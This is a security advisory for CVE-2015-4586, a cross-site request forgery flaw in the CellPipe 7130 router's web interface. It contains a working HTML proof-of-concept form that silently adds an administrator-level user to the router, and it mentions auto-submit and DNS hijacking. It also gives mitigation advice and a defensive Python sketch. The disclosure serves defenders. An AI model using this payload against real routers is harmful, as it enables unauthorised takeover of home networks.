
CellPipe 7130 Cross Site Request Forgery

16 Jun 2015 00:00:00 | Reported by Dionisia Lerataki | Type: packetstorm | Source: packetstormsecurity.com

CellPipe 7130 RG 5Ae. M2013 HOL CSRF vulnerability with DNS Hijacking, Service Exposure, and User Account Creation

Related

| Reporter | Title | Published |
|---|---|---|
| CNVD | Alcatel-Lucent CellPipe 7130 RG 5Ae.M2013 HOL Cross-Site Request Forgery Vulnerability | 26 Jun 2015 00:00 |
| CVE | CVE-2015-4586 | 23 Jun 2015 14:00 |
| Cvelist | CVE-2015-4586 | 23 Jun 2015 14:00 |
| EUVD | EUVD-2015-4606 | 7 Oct 2025 00:30 |
| NVD | CVE-2015-4586 | 23 Jun 2015 14:59 |
| Prion | Cross site request forgery (csrf) | 23 Jun 2015 14:59 |

`CellPipe Router CSRF vulnerability  
  
Device model : CellPipe 7130 RG 5Ae. M2013 HOL  
Software Version: 1.0.0.20h.HOL  
CWE: 352 - https://cwe.mitre.org/data/definitions/352.html  
CVE: CVE-2015-4586  
Date: 16/06/2015  
Discovered by: Dionisia Lerataki  
(https://gr.linkedin.com/pub/dionisia-lerataki/88/18/891)  
  
  
Vulnerability type: Multiple CSRF vulnerabilities in the router's web  
interface  
  
CSRF (Cross Site Request Forgery) is an attack which forces an end user to  
execute unwanted actions on a web application in which he/she is currently  
authenticated. It is currently included in the OWASP Top 10 project.  
  
Exploitation and Impact:  
  
Exploitation of the above vulnerabilities, combined with a social  
engineering attack, may lead to:  
  
• Unwanted service exposure  
• DNS Hijacking  
• Disabling wireless security  
• User account creation  
  
I have tested the scenario with the user account creation and the proof of  
concept is the following:  
  
<html>  
<body>  
<form action="http://192.168.1.1/password.cmd">  
<input type="hidden" name="action" value="add_user" />  
<input type="hidden" name="userAdd" value="csrf" />  
<input type="hidden" name="pwdAdd" value="csrf" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
If a router administrator executes the above code, a user with credentials  
(csrf/csrf) will be added.  
In our PoC the administrator must press the "Submit request" button, but in a  
real attack scenario an attacker can implement auto-submit JavaScript code.  
  
In our case the router IP address is: 192.168.1.1. Of course it can be  
exploited with the router's public IP address.  
  
Suggested mitigation:  
  
In order to properly patch the CSRF vulnerability, the following measures  
have to be taken:  
  
• Add a randomly generated token associated with the user's session in order  
to prevent a CSRF attack. Alternatively, a check of the Referer header can be  
introduced. Although Referer headers can be easily spoofed, they can  
prevent a CSRF attack of this kind.  
`
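
The suggested mitigation, sketched server-side as an added example (not code from the advisory or from the router firmware): a random token tied to the administrator's session plus a Referer check on the `add_user` request. The handler, the session store and the `csrf_token` field name are assumptions; `action`, `userAdd`, `pwdAdd` and the address 192.168.1.1 are taken from the PoC above.

```python
import hmac
import secrets
from urllib.parse import urlsplit

ROUTER_HOSTS = {"192.168.1.1"}   # LAN address used in the advisory's PoC
SESSIONS = {}                    # session id -> CSRF token (hypothetical session store)

def login():
    """Create an admin session and its random per-session CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = secrets.token_urlsafe(32)
    return sid

def same_site(headers):
    """Referer check: the request must come from one of the router's own pages."""
    try:
        host = urlsplit(headers.get("Referer", "")).hostname
    except ValueError:           # malformed Referer value
        return False
    return host in ROUTER_HOSTS  # a missing Referer is rejected as well

def password_cmd(method, sid, headers, params, users):
    """Hypothetical handler for password.cmd; returns an HTTP status code."""
    expected = SESSIONS.get(sid)
    if expected is None:
        return 401               # not logged in
    if method != "POST":
        return 405               # the PoC form has no method, so it submits as GET
    sent = params.get("csrf_token", "")   # field name is an assumption
    if not hmac.compare_digest(sent.encode(), expected.encode()):
        return 403               # token missing, or issued to another session
    if not same_site(headers):
        return 403               # request originated from a foreign page
    if params.get("action") == "add_user":
        users[params["userAdd"]] = params["pwdAdd"]
        return 200
    return 400
```

The router's own pages would embed `SESSIONS[sid]` as a hidden field in every state-changing form; a page on another origin cannot read that value, so the forged form from the PoC is rejected.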
